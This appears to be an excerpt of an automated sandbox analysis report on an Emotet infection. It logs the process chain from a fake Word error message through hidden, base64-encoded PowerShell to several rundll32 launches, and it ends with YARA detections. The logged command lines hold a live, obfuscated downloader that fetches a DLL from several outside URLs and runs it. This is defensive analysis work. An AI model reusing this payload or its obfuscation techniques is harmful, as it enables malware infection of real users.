                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000009.00000002.2125204739.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2340896532.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2169811211.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2182561871.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135567121.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2339373586.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2192714957.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2149727008.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2192700429.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2182761575.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2165744116.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2128583729.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2125222649.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2151547723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2102076691.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2135550534.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2114421803.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
